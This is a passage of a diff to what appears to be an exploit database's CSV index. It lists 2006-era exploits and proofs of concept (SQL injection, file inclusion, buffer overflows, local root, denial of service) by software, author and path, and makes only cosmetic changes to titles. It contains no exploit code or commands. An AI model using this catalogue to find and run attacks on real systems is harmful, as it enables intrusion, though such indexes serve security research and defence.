Moore",osx,remote,0 @@ -1291,7 +1291,7 @@ id,file,description,date,author,platform,type,port 1548,platforms/php/webapps/1548.pl,"MyBulletinBoard (MyBB) <= 1.04 (misc.php COMMA) SQL Injection (2)",2006-03-03,Devil-00,php,webapps,0 1549,platforms/php/webapps/1549.php,"PHP-Stats <= 0.1.9.1 Remote Commands Execution Exploit",2006-03-04,rgod,php,webapps,0 1550,platforms/asp/webapps/1550.txt,"TotalECommerce <= 1.0 (index.asp id) Remote SQL Injection Exploit",2006-03-04,nukedx,asp,webapps,0 -1551,platforms/hardware/dos/1551.txt,"Multiple Routers (IRC Request) Disconnect Denial of Service Vulnerability",2006-03-04,"Ryan Meyer",hardware,dos,0 +1551,platforms/hardware/dos/1551.txt,"Multiple Routers (IRC Request) Disconnect Denial of Service Vulnerability",2006-03-04,"Ryan Meyer",hardware,dos,0 1552,platforms/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 (Port) Remote Overflow PoC",2006-03-04,luka.research,windows,dos,0 1553,platforms/php/webapps/1553.pl,"Fantastic News <= 2.1.2 (script_path) Remote Code Execution Exploit",2006-03-04,uid0,php,webapps,0 1554,platforms/multiple/local/1554.c,"LibTiff 3.7.1 (BitsPerSample Tag) Local Buffer Overflow Exploit",2006-03-05,"Agustin Gianni",multiple,local,0 @@ -1337,11 +1337,11 @@ id,file,description,date,author,platform,type,port 1596,platforms/linux/local/1596.txt,"X.Org X11 (X11R6.9.0/X11R7.0) Local Root Privilege Escalation Exploit",2006-03-20,"H D Moore",linux,local,0 1597,platforms/asp/webapps/1597.pl,"ASPPortal <= 3.1.1 (downloadid) Remote SQL Injection Exploit",2006-03-20,nukedx,asp,webapps,0 1598,platforms/windows/dos/1598.html,"MS Internet Explorer 6.0 (script action handlers) (mshtml.dll) DoS",2006-03-21,"Michal Zalewski",windows,dos,0 -1599,platforms/windows/dos/1599.cpp,"MS Windows XP/2003 (IGMP v3) Denial of Service Exploit (MS06-007)",2006-03-21,"Alexey Sintsov",windows,dos,0 +1599,platforms/windows/dos/1599.cpp,"MS Windows XP/2003 (IGMP v3) - Denial of Service Exploit (MS06-007)",2006-03-21,"Alexey Sintsov",windows,dos,0 1600,platforms/php/webapps/1600.php,"FreeWPS <= 2.11 (images.php) Remote Code Execution Exploit",2006-03-21,x128,php,webapps,0 1601,platforms/windows/dos/1601.c,"ASP.NET w3wp (COM Components) Remote Crash Exploit",2006-03-22,"Debasis Mohanty",windows,dos,0 1602,platforms/multiple/remote/1602.c,"BomberClone < 0.11.6.2 (Error Messages) Remote Buffer Overflow Exploit",2006-03-22,"esca zoo",multiple,remote,11000 -1603,platforms/windows/dos/1603.c,"MS Windows XP/2003 (IGMP v3) Denial of Service Exploit (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0 +1603,platforms/windows/dos/1603.c,"MS Windows XP/2003 - (IGMP v3) Denial of Service Exploit (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0 1604,platforms/windows/dos/1604.html,"MS Internet Explorer 6.0 (mshtml.dll checkbox) Crash",2006-03-22,"Stelian Ene",windows,dos,0 1605,platforms/php/webapps/1605.php,"XHP CMS <= 0.5 (upload) Remote Command Execution Exploit",2006-03-22,rgod,php,webapps,0 1606,platforms/windows/remote/1606.html,"MS Internet Explorer (createTextRang) Remote Code Execution Exploit",2006-03-23,darkeagle,windows,remote,0 @@ -1361,7 +1361,7 @@ id,file,description,date,author,platform,type,port 1620,platforms/windows/remote/1620.pm,"MS Internet Explorer (createTextRang) Remote Exploit (meta update)",2006-04-01,"Randy Flood",windows,remote,0 1621,platforms/php/webapps/1621.php,"Plogger <= Beta 2.1 Administrative Credentials Disclosure Exploit",2006-03-28,rgod,php,webapps,0 1622,platforms/multiple/dos/1622.pl,"RealPlayer <= 10.5 (6.0.12.1040-1348) SWF Buffer Overflow PoC",2006-03-28,"Federico L. Bossi Bonin",multiple,dos,0 -1623,platforms/asp/webapps/1623.pl,"EzASPSite <= 2.0 RC3 (Scheme) Remote SQL Injection Exploit",2006-03-29,nukedx,asp,webapps,0 +1623,platforms/asp/webapps/1623.pl,"EzASPSite <= 2.0 RC3 (Scheme) Remote SQL Injection Exploit",2006-03-29,nukedx,asp,webapps,0 1624,platforms/tru64/local/1624.pl,"Tru64 UNIX 5.0 (Rev. 910) rdist NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0 1625,platforms/tru64/local/1625.pl,"Tru64 UNIX 5.0 (Rev. 910) edauth NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0 1626,platforms/windows/remote/1626.pm,"PeerCast <= 0.1216 Remote Buffer Overflow Exploit (win32) (meta)",2006-03-30,"H D Moore",windows,remote,7144 @@ -1371,7 +1371,7 @@ id,file,description,date,author,platform,type,port 1630,platforms/php/webapps/1630.pl,"PHPNuke-Clan 3.0.1 (vwar_root2) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0 1631,platforms/php/webapps/1631.php,"ReloadCMS <= 1.2.5 Cross Site Scripting / Remote Code Execution Exploit",2006-04-02,rgod,php,webapps,0 1632,platforms/php/webapps/1632.pl,"VWar 1.5.0 R12 Remote File Inclusion Exploit",2006-04-02,uid0,php,webapps,0 -1633,platforms/windows/dos/1633.c,"Total Commander 6.x (unacev2.dll) Buffer Overflow PoC Exploit",2006-04-02,darkeagle,windows,dos,0 +1633,platforms/windows/dos/1633.c,"Total Commander 6.x - (unacev2.dll) Buffer Overflow PoC Exploit",2006-04-02,darkeagle,windows,dos,0 1634,platforms/linux/dos/1634.pl,"mpg123 0.59r Malformed mp3 (SIGSEGV) Proof of Concept",2006-04-02,nitr0us,linux,dos,0 1640,platforms/php/webapps/1640.pl,"AngelineCMS 0.8.1 (installpath) Remote File Inclusion Exploit",2006-04-04,K-159,php,webapps,0 1641,platforms/linux/dos/1641.pl,"Libxine <= 1.14 MPEG Stream Buffer Overflow Vulnerability PoC",2006-04-04,"Federico L. Bossi Bonin",linux,dos,0 @@ -1418,8 +1418,8 @@ id,file,description,date,author,platform,type,port 1694,platforms/php/webapps/1694.pl,"Internet PhotoShow (page) Remote File Inclusion Exploit",2006-04-18,Hessam-x,php,webapps,0 1695,platforms/php/webapps/1695.pl,"PHP Net Tools <= 2.7.1 Remote Code Execution Exploit",2006-04-18,FOX_MULDER,php,webapps,0 1697,platforms/php/webapps/1697.php,"PCPIN Chat <= 5.0.4 (login/language) Remote Code Execution Exploit",2006-04-19,rgod,php,webapps,0 -1698,platforms/php/webapps/1698.php,"Mambo <= 4.5.3 , Joomla <=1.0.7 (feed) Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0 -1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 <= 1.1.3 Remote Inclusion Vulnerability",2006-04-19,"GroundZero Security",php,webapps,0 +1698,platforms/php/webapps/1698.php,"Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0 +1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 <= 1.1.3 - Remote Inclusion Vulnerability",2006-04-19,"GroundZero Security",php,webapps,0 1700,platforms/asp/webapps/1700.pl,"ASPSitem <= 1.83 (Haberler.asp) Remote SQL Injection Exploit",2006-04-19,nukedx,asp,webapps,0 1701,platforms/php/webapps/1701.php,"PHPSurveyor <= 0.995 (surveyid) Remote Command Execution Exploit",2006-04-20,rgod,php,webapps,0 1703,platforms/windows/remote/1703.pl,"Symantec Scan Engine 5.0.x.x Change Admin Password Remote Exploit",2006-04-21,"Marc Bevand",windows,remote,8004 @@ -1466,7 +1466,7 @@ id,file,description,date,author,platform,type,port 1749,platforms/windows/dos/1749.pl,"acFTP FTP Server <= 1.4 (USER) Remote Buffer Overflow PoC",2006-05-04,Preddy,windows,dos,0 1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b R_RemapShader() Remote Client BoF Exploit",2006-05-05,landser,linux,remote,0 1751,platforms/php/webapps/1751.php,"Limbo CMS <= 1.0.4.2 (catid) Remote SQL Injection Exploit",2006-05-05,[Oo],php,webapps,0 -1752,platforms/php/webapps/1752.pl,"StatIt v4 (statitpath) Remote File Inclusion Exploit",2006-05-05,IGNOR3,php,webapps,0 +1752,platforms/php/webapps/1752.pl,"StatIt 4 - (statitpath) Remote File Inclusion Exploit",2006-05-05,IGNOR3,php,webapps,0 1753,platforms/php/webapps/1753.txt,"TotalCalendar <= 2.30 (inc) Remote File Include Vulnerability",2006-05-05,Aesthetico,php,webapps,0 1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server <= 1.01 (USER) Remote Pre-Auth DoS",2006-05-05,Bigeazer,windows,dos,0 1755,platforms/cgi/webapps/1755.py,"AWStats <= 6.5 (migrate) Remote Shell Command Injection Exploit",2006-05-06,redsand,cgi,webapps,0 @@ -1513,7 +1513,7 @@ id,file,description,date,author,platform,type,port 1800,platforms/php/webapps/1800.txt,"ScozNews <= 1.2.1 (mainpath) Remote File Inclusion Vulnerability",2006-05-17,Kacper,php,webapps,0 1801,platforms/multiple/dos/1801.txt,"libextractor <= 0.5.13 Multiple Heap Overflow PoC Exploits",2006-05-17,"Luigi Auriemma",multiple,dos,0 1802,platforms/multiple/dos/1802.html,"Mozilla Firefox <= 1.5.0.3 (Loop) Denial of Service Exploit",2006-05-18,"Gianni Amato",multiple,dos,0 -1804,platforms/php/webapps/1804.txt,"phpBazar <= 2.1.0 Remote (Include/Auth Bypass) Vulnerabilities",2006-05-19,[Oo],php,webapps,0 +1804,platforms/php/webapps/1804.txt,"phpBazar <= 2.1.0 Remote (Include/Auth Bypass) Vulnerabilities",2006-05-19,[Oo],php,webapps,0 1805,platforms/php/webapps/1805.pl,"phpListPro <= 2.0.1 (Language) Remote Code Execution Exploit",2006-05-19,[Oo],php,webapps,0 1806,platforms/windows/local/1806.c,"IntelliTamper 2.07 (*.map file) Local Arbitrary Code Execution Exploit",2006-05-19,Devil-00,windows,local,0 1807,platforms/asp/webapps/1807.txt,"Zix Forum <= 1.12 (layid) SQL Injection Vulnerability",2006-05-19,FarhadKey,asp,webapps,0 @@ -1595,7 +1595,7 @@ id,file,description,date,author,platform,type,port 1885,platforms/windows/remote/1885.pl,"QBik Wingate 6.1.1.1077 (POST) Remote Buffer Overflow Exploit",2006-06-07,Kingcope,windows,remote,80 1886,platforms/php/webapps/1886.txt,"OpenEMR <= 2.8.1 (fileroot) Remote File Include Vulnerability",2006-06-07,Kacper,php,webapps,0 1887,platforms/php/webapps/1887.txt,"Xtreme/Ditto News <= 1.0 (post.php) Remote File Include Vulnerability",2006-06-07,Kacper,php,webapps,0 -1888,platforms/php/webapps/1888.txt,"Back-End CMS <= 0.7.2.1 (jpcache.php) Remote Include Vulnerability",2006-06-08,"Federico Fazzi",php,webapps,0 +1888,platforms/php/webapps/1888.txt,"Back-End CMS <= 0.7.2.1 (jpcache.php) Remote Include Vulnerability",2006-06-08,"Federico Fazzi",php,webapps,0 1889,platforms/hardware/remote/1889.txt,"D-Link Access-Point <= 2.10na (DWL Series) Config Disclosure Vuln",2006-06-08,INTRUDERS,hardware,remote,0 1890,platforms/php/webapps/1890.txt,"cms-bandits 2.5 (spaw_root) Remote File Include Vulnerabilities",2006-06-08,"Federico Fazzi",php,webapps,0 1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems <= 1.1 (footer) Remote Include Vulnerability",2006-06-08,Kacper,php,webapps,0 @@ -1681,7 +1681,7 @@ id,file,description,date,author,platform,type,port 1972,platforms/multiple/dos/1972.txt,"Opera Web Browser 9.00 (iframe) Remote Denial of Service Exploit",2006-07-01,y3dips,multiple,dos,0 1973,platforms/osx/local/1973.pl,"Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (ppc)",2006-07-01,"Kevin Finisterre",osx,local,0 1974,platforms/php/webapps/1974.txt,"SmartSiteCMS 1.0 (root) Multiple Remote File Inclusion Vulnerabilities",2006-07-01,CrAsh_oVeR_rIdE,php,webapps,0 -1975,platforms/php/webapps/1975.pl,"BXCP <= 0.3.0.4 (where) Remote SQL Injection Exploit",2006-07-02,x23,php,webapps,0 +1975,platforms/php/webapps/1975.pl,"BXCP <= 0.3.0.4 (where) Remote SQL Injection Exploit",2006-07-02,x23,php,webapps,0 1976,platforms/windows/dos/1976.cpp,"Quake 3 Engine Client CG_ServerCommand() Remote Overflow Exploit",2006-07-02,RunningBon,windows,dos,0 1977,platforms/windows/dos/1977.cpp,"Quake 3 Engine Client CS_ITEMS Remote Overflow Exploit (Win32)",2006-07-02,RunningBon,windows,dos,0 1978,platforms/windows/local/1978.pl,"Microsoft Excel Universal Hlink Local Buffer Overflow Exploit",2006-07-02,"SYS 49152",windows,local,0 @@ -1709,14 +1709,14 @@ id,file,description,date,author,platform,type,port 2001,platforms/windows/dos/2001.c,"Microsoft Word 2000/2003 Unchecked Boundary Condition Vulnerability",2006-07-10,"naveed afzal",windows,dos,0 2002,platforms/php/webapps/2002.pl,"EJ3 TOPo 2.2 (descripcion) Remote Command Execution Exploit",2006-07-10,Hessam-x,php,webapps,0 2003,platforms/php/webapps/2003.txt,"SQuery <= 4.5 (gore.php) Remote File Inclusion Vulnerability",2006-07-10,SHiKaA,php,webapps,0 -2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0 -2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)",2006-07-12,"Julien Tinnes",linux,local,0 -2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)",2006-07-13,"Marco Ivaldi",linux,local,0 +2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0 +2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (2)",2006-07-12,"Julien Tinnes",linux,local,0 +2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (3)",2006-07-13,"Marco Ivaldi",linux,local,0 2007,platforms/php/webapps/2007.php,"phpBB 3 (memberlist.php) Remote SQL Injection Exploit",2006-07-13,rgod,php,webapps,0 2008,platforms/php/webapps/2008.php,"Phorum 5 (pm.php) Arbitrary Local Inclusion Exploit",2006-07-13,rgod,php,webapps,0 2009,platforms/php/webapps/2009.txt,"CzarNews <= 1.14 (tpath) Remote File Inclusion Vulnerability",2006-07-13,SHiKaA,php,webapps,0 -2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 Remote SQL Injection Exploit",2006-07-14,RusH,php,webapps,0 -2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0 +2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit",2006-07-14,RusH,php,webapps,0 +2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0 2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0 2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit",2006-07-15,h00lyshit,linux,local,0 2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515 @@ -1736,9 +1736,9 @@ id,file,description,date,author,platform,type,port 2028,platforms/php/webapps/2028.txt,"Sitemap Mambo Component <= 2.0.0 Remote Include Vulnerability",2006-07-17,Matdhule,php,webapps,0 2029,platforms/php/webapps/2029.txt,"pollxt Mambo Component <= 1.22.07 Remote Include Vulnerability",2006-07-17,vitux,php,webapps,0 2030,platforms/php/webapps/2030.txt,"MiniBB Mambo Component <= 1.5a Remote File Include Vulnerabilities",2006-07-17,Matdhule,php,webapps,0 -2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)",2006-07-18,"Marco Ivaldi",linux,local,0 +2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - prctl() Local Root Exploit (logrotate)",2006-07-18,"Marco Ivaldi",linux,local,0 2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 Remote Blind SQL Injection Exploit",2006-07-18,"Jacek Wlodarczyk",php,webapps,0 -2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 Remote SQL Injection Exploit (2)",2006-07-18,"w4g.not null",php,webapps,0 +2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit (2)",2006-07-18,"w4g.not null",php,webapps,0 2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) Multiple Vulnerabilities",2006-07-18,"Adrian ""pagvac"" Pastor",hardware,remote,0 2035,platforms/php/webapps/2035.php,"toendaCMS <= 1.0.0 (FCKeditor) Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0 2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 Cookie Modification Privilege Escalation Vulnerability",2006-07-18,FarhadKey,php,webapps,0 @@ -1770,7 +1770,7 @@ id,file,description,date,author,platform,type,port 2070,platforms/windows/remote/2070.pl,"SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit",2006-07-24,"Jacopo Cervini",windows,remote,5060 2071,platforms/php/webapps/2071.php,"Etomite CMS <= 0.6.1 (username) SQL Injection Exploit (mq = off)",2006-07-25,rgod,php,webapps,0 2072,platforms/php/webapps/2072.php,"Etomite CMS <= 0.6.1 (rfiles.php) Remote Command Execution Exploit",2006-07-25,rgod,php,webapps,0 -2073,platforms/multiple/dos/2073.c,"libmikmod <= 3.2.2 (GT2 loader) Local Heap Overflow PoC",2006-07-25,"Luigi Auriemma",multiple,dos,0 +2073,platforms/multiple/dos/2073.c,"libmikmod <= 3.2.2 (GT2 loader) Local Heap Overflow PoC",2006-07-25,"Luigi Auriemma",multiple,dos,0 2074,platforms/windows/remote/2074.pm,"eIQnetworks License Manager Remote Buffer Overflow Exploit (1262)",2006-07-26,ri0t,windows,remote,10616 2075,platforms/windows/remote/2075.pm,"eIQnetworks License Manager Remote Buffer Overflow Exploit (494)",2006-07-26,ri0t,windows,remote,0 2076,platforms/windows/remote/2076.pl,"AIM Triton 1.0.4 (SipXtapi) Remote Buffer Overflow Exploit (PoC)",2006-07-26,c0rrupt,windows,remote,5061 @@ -1784,7 +1784,7 @@ id,file,description,date,author,platform,type,port 2084,platforms/php/webapps/2084.txt,"Mambo MGM Component <= 0.95r2 Remote Inclusion Vulnerability",2006-07-28,"A-S-T TEAM",php,webapps,0 2085,platforms/php/webapps/2085.txt,"Mambo Colophon Component <= 1.2 Remote Inclusion Vulnerability",2006-07-29,Drago84,php,webapps,0 2086,platforms/php/webapps/2086.txt,"Mambo mambatStaff Component <= 3.1b Remote Inclusion Vulnerability",2006-07-29,Dr.Jr7,php,webapps,0 -2087,platforms/php/webapps/2087.php,"vbPortal 3.0.2 <= 3.6.0 b1 (cookie) Remote Code Excution Exploit",2006-07-29,R00t[ATI],php,webapps,0 +2087,platforms/php/webapps/2087.php,"vbPortal 3.0.2 <= 3.6.0 b1 - (cookie) Remote Code Excution Exploit",2006-07-29,R00t[ATI],php,webapps,0 2088,platforms/php/webapps/2088.php,"ATutor <= 1.5.3.1 (links) Remote Blind SQL Injection Exploit",2006-07-30,rgod,php,webapps,0 2089,platforms/php/webapps/2089.txt,"Mambo User Home Pages Component <= 0.5 Remote Include Vulnerability",2006-07-30,"Kurdish Security",php,webapps,0 2090,platforms/php/webapps/2090.txt,"Joomla com_bayesiannaivefilter Component <= 1.1 Inclusion Vulnerability",2006-07-30,Pablin77,php,webapps,0 @@ -1829,7 +1829,7 @@ id,file,description,date,author,platform,type,port 2132,platforms/php/webapps/2132.txt,"phpAutoMembersArea <= 3.2.5 (installed_config_file) Remote Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 2133,platforms/php/webapps/2133.txt,"Simple CMS Administrator Authentication Bypass Vulnerability",2006-08-07,daaan,php,webapps,0 2134,platforms/php/webapps/2134.txt,"phpCC 4.2 beta (base_dir) Remote File Inclusion Vulnerability",2006-08-07,Solpot,php,webapps,0 -2135,platforms/php/webapps/2135.txt,"NEWSolved Lite v1.9.2 (abs_path) Remote File Inclusion Vulnerabilities",2006-08-07,"Philipp Niedziela",php,webapps,0 +2135,platforms/php/webapps/2135.txt,"NEWSolved Lite 1.9.2 - (abs_path) Remote File Inclusion Vulnerabilities",2006-08-07,"Philipp Niedziela",php,webapps,0 2136,platforms/hardware/remote/2136.txt,"Barracuda Spam Firewall <= 3.3.03.053 Remote Code Execution",2006-08-07,"Greg Sinclair",hardware,remote,0 2137,platforms/php/webapps/2137.txt,"QuestCMS (main.php) Remote File Include Vulnerability",2006-08-07,Crackers_Child,php,webapps,0 2138,platforms/asp/webapps/2138.txt,"YenerTurk Haber Script 1.0 Remote SQL Injection Vulnerability",2006-08-07,ASIANEAGLE,asp,webapps,0 @@ -1890,7 +1890,7 @@ id,file,description,date,author,platform,type,port 2193,platforms/linux/local/2193.php,"PHP <= 4.4.3 / 5.1.4 (sscanf) Local Buffer Overflow Exploit",2006-08-16,andi,linux,local,0 2194,platforms/windows/dos/2194.pl,"MS Windows PNG File IHDR Block Denial of Service Exploit PoC",2006-08-16,Preddy,windows,dos,0 2195,platforms/windows/dos/2195.html,"VMware 5.5.1 COM Object Arbitrary Partition Table Delete Exploit",2006-08-16,nop,windows,dos,0 -2196,platforms/php/webapps/2196.txt,"Mambo CopperminePhotoGalery Component Remote Include Vulnerability",2006-08-16,k1tk4t,php,webapps,0 +2196,platforms/php/webapps/2196.txt,"Mambo CopperminePhotoGalery Component Remote Include Vulnerability",2006-08-16,k1tk4t,php,webapps,0 2198,platforms/php/webapps/2198.php,"CubeCart <= 3.0.11 (oid) Remote Blind SQL Injection Exploit",2006-08-17,rgod,php,webapps,0 2199,platforms/php/webapps/2199.txt,"IRSR <= 0.2 (_sysSessionPath) Remote File Include Vulnerability",2006-08-17,Kacper,php,webapps,0 2200,platforms/php/webapps/2200.txt,"WTcom <= 0.2.4-alpha (torrents.php) Remote SQL Injection Vulnerability",2006-08-17,sh1r081,php,webapps,0 @@ -1912,7 +1912,7 @@ id,file,description,date,author,platform,type,port 2216,platforms/php/webapps/2216.txt,"Sonium Enterprise Adressbook <= 0.2 (folder) Include Vulnerability",2006-08-18,"Philipp Niedziela",php,webapps,0 2217,platforms/php/webapps/2217.txt,"Mambo cropimage Component <= 1.0 Remote File Include Vulnerability",2006-08-19,"Mehmet Ince",php,webapps,0 2218,platforms/php/webapps/2218.txt,"interact <= 2.2 (CONFIG[BASE_PATH]) Remote File Include Vulnerability",2006-08-19,Kacper,php,webapps,0 -2219,platforms/php/webapps/2219.php,"Joomla <=1.0.10 (poll component) Arbitrary Add Votes Exploit",2006-08-19,trueend5,php,webapps,0 +2219,platforms/php/webapps/2219.php,"Joomla <= 1.0.10 - (poll component) Arbitrary Add Votes Exploit",2006-08-19,trueend5,php,webapps,0 2220,platforms/php/webapps/2220.txt,"Tutti Nova <= 1.6 (TNLIB_DIR) Remote File Include Vulnerability",2006-08-19,SHiKaA,php,webapps,0 2221,platforms/php/webapps/2221.txt,"Fantastic News <= 2.1.3 (script_path) Remote File Include Vulnerability",2006-08-19,SHiKaA,php,webapps,0 2222,platforms/php/webapps/2222.txt,"Mambo com_lurm_constructor Component <= 0.6b Include Vulnerability",2006-08-19,mdx,php,webapps,0 @@ -1945,12 +1945,12 @@ id,file,description,date,author,platform,type,port 2249,platforms/php/webapps/2249.txt,"pSlash 0.7 (lvc_include_dir) Remote File Include Vulnerability",2006-08-23,"Mehmet Ince",php,webapps,0 2250,platforms/php/webapps/2250.pl,"Integramod Portal <= 2.x (functions_portal.php) Remote Include Exploit",2006-08-23,nukedx,php,webapps,0 2251,platforms/php/webapps/2251.pl,"VistaBB <= 2.x (functions_mod_user.php) Remote Include Exploit",2006-08-23,nukedx,php,webapps,0 -2252,platforms/php/webapps/2252.pl,"Wikepage Opus 10 <= 2006.2a (lng) Remote Command Execution Exploit",2006-08-24,Hessam-x,php,webapps,0 +2252,platforms/php/webapps/2252.pl,"Wikepage Opus 10 <= 2006.2a (lng) - Remote Command Execution Exploit",2006-08-24,Hessam-x,php,webapps,0 2253,platforms/php/webapps/2253.php,"Phaos <= 0.9.2 basename() Remote Command Execution Exploit",2006-08-24,Kacper,php,webapps,0 2254,platforms/php/webapps/2254.txt,"phpCOIN 1.2.3 (session_set.php) Remote Include Vulnerability",2006-08-24,Timq,php,webapps,0 2255,platforms/php/webapps/2255.txt,"eFiction < 2.0.7 Remote Admin Authentication Bypass Vulnerability",2006-08-25,Vipsta,php,webapps,0 2256,platforms/php/webapps/2256.txt,"Integramod Portal <= 2.0 rc2 (phpbb_root_path) Remote File Include",2006-08-25,MATASANOS,php,webapps,0 -2257,platforms/php/webapps/2257.txt,"CliServ Web Community <= 0.65 (cl_headers) Include Vulnerability",2006-08-25,Kacper,php,webapps,0 +2257,platforms/php/webapps/2257.txt,"CliServ Web Community <= 0.65 (cl_headers) Include Vulnerability",2006-08-25,Kacper,php,webapps,0 2258,platforms/windows/remote/2258.py,"MDaemon POP3 Server < 9.06 (USER) Remote Heap Overflow Exploit",2006-08-26,muts,windows,remote,110 2259,platforms/php/webapps/2259.txt,"proManager <= 0.73 (note.php) Remote SQL Injection Vulnerability",2006-08-26,Kacper,php,webapps,0 2260,platforms/php/webapps/2260.pl,"AlberT-EasySite <= 1.0a5 (PSA_PATH) Remote File Include Exploit",2006-08-27,Kacper,php,webapps,0 @@ -1961,7 +1961,7 @@ id,file,description,date,author,platform,type,port 2265,platforms/windows/remote/2265.c,"MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445 2266,platforms/cgi/webapps/2266.txt,"Cybozu Products (id) Arbitrary File Retrieval Vulnerability",2006-08-28,"Tan Chew Keong",cgi,webapps,0 2267,platforms/cgi/webapps/2267.txt,"Cybuzu Garoon 2.1.0 Multiple Remote SQL Injection Vulnerabilities",2006-08-28,"Tan Chew Keong",cgi,webapps,0 -2268,platforms/php/webapps/2268.php,"e107 <= 0.75 (GLOBALS Overwrite) Remote Code Execution Exploit",2006-08-28,rgod,php,webapps,0 +2268,platforms/php/webapps/2268.php,"e107 <= 0.75 - (GLOBALS Overwrite) Remote Code Execution Exploit",2006-08-28,rgod,php,webapps,0 2269,platforms/php/webapps/2269.txt,"Web3news <= 0.95 (PHPSECURITYADMIN_PATH) Remote Include Vuln",2006-08-28,SHiKaA,php,webapps,0 2270,platforms/php/webapps/2270.php,"phpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit",2006-08-29,Kacper,php,webapps,0 2271,platforms/php/webapps/2271.txt,"PortailPHP mod_phpalbum <= 2.1.5 (chemin) Remote Include Vuln",2006-08-29,"Mehmet Ince",php,webapps,0 @@ -1980,7 +1980,7 @@ id,file,description,date,author,platform,type,port 2284,platforms/windows/local/2284.c,"TIBCO Rendezvous <= 7.4.11 Password Extractor Local Exploit",2006-09-01,"Andres Tarasco",windows,local,0 2285,platforms/php/webapps/2285.txt,"MyBace Light (login_check.php) Remote File Vulnerability",2006-09-01,"Philipp Niedziela",php,webapps,0 2286,platforms/windows/local/2286.cpp,"PowerZip <= 7.06.3895 Long Filename Handling Buffer Overflow Exploit",2006-09-01,bratax,windows,local,0 -2287,platforms/asp/webapps/2287.txt,"icblogger v2 (YID) Remote SQL Injection Vulnerability",2006-09-01,"Chironex Fleckeri",asp,webapps,0 +2287,platforms/asp/webapps/2287.txt,"icblogger 2.0 - (YID) Remote SQL Injection Vulnerability",2006-09-01,"Chironex Fleckeri",asp,webapps,0 2288,platforms/php/webapps/2288.php,"TikiWiki <= 1.9 Sirius (jhot.php) Remote Command Execution Exploit",2006-09-02,rgod,php,webapps,0 2289,platforms/php/webapps/2289.pl,"Annuaire 1Two 2.2 Remote SQL Injection Exploit",2006-09-02,DarkFig,php,webapps,0 2290,platforms/php/webapps/2290.txt,"Dyncms <= Release 6 (x_admindir) Remote File Include Vulnerability",2006-09-02,SHiKaA,php,webapps,0 @@ -2023,9 +2023,9 @@ id,file,description,date,author,platform,type,port 2327,platforms/php/webapps/2327.txt,"PhotoKorn Gallery <= 1.52 (dir_path) Remote File Include Vulnerabilities",2006-09-07,"Saudi Hackrz",php,webapps,0 2328,platforms/windows/remote/2328.php,"RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution Exploit",2006-09-08,rgod,windows,remote,80 2329,platforms/php/webapps/2329.txt,"Somery <= 0.4.6 (skin_dir) Remote File Include Vulnerability",2006-09-08,basher13,php,webapps,0 -2330,platforms/solaris/local/2330.c,"X11R6 <= 6.4 XKEYBOARD Local Buffer Overflow Exploit (solaris/sparc)",2006-09-08,"RISE Security",solaris,local,0 -2331,platforms/solaris/local/2331.c,"X11R6 <= 6.4 XKEYBOARD Local Buffer Overflow Exploit (solaris/x86)",2006-09-08,"RISE Security",solaris,local,0 -2332,platforms/sco/local/2332.c,"X11R6 <= 6.4 XKEYBOARD Local Buffer Overflow Exploit 